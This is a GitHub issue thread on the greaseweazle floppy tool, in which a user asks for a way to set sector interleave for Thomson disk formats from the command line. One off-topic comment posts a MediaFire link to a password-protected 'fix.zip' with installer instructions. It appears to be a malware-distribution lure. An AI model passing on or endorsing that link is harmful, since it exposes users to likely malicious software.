### ISSUE TITLE
Can we have a `--interleave` option?

### ISSUE THREAD

**Issue by fplanque** [keirf/greaseweazle#482]
For example for the Thomson formats, I configured a (default) interleave of 7, which is appropriate for disks that contain BASIC programs to be read an written by the built in BASIC of Thomson computers.

However, most games came with an optimized loader written in assembly that could read faster into memory. Those disks would benefits (depending on the loader) of an interleave of 4 or even 2 in some cases.

It would be beneficial to be able to quickly override the default interleave, on a disk by disk basis, like this:

`gw write --drive=0 --format=thomson.2s320 --interleave=2 optimized_game.fd`

**Comment by keirf** [comment]
Make yourself some local diskdefs and refer to that file via `--diskdefs=`. For example `--diskdefs=thomson_interleave_2.cfg --format=thomson.2s320`. That is, you already have this capability and I don't want to start pushing these diskdef sub-options into the command line itself.

**Comment by SupunDevendra** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by fplanque** [comment]
@keirf I get where you're coming from and I understand how to use custom diskdefs (as I have done it already).

However, before I rest my case, please 🙏 hear me out:

I'm not suggesting this because there is a roadblock to achieve the goal. I am suggesting this to make the tool more convenient in certain use cases.

The diskdefs file is useful when using the same formats over and over again, but it is inconvenient in two ways:

1. when working with multiple directories, referencing the diskdefs file path is a bit painful
2. when trying out "_non standard_" variations of a _standard_ format for a specific disk, it's more convient to be able to do it on the command line.
3. When explaining to "a non technical retro computer end user" how to do something in a forum or chat, it's 10x easier to send them a command line rather than a command line PLUS a diskdefs files PLUS an explanation about how to create the diskdefs file PLUS where to put the diskdefs file.

**But perhaps more importantly:**

`gw` actually already provides `--tracks TSPEC` and we ❤️ it for that!  

So I actually realize I can make a better suggestion:

**Can we add `i=[1-9]` in the TSPEC definition?**

For example `--TSPEC c=0-83:i=4` (non standard number of tracks + non standard interleave)

Thank you thank you thank you for your consideration 😃
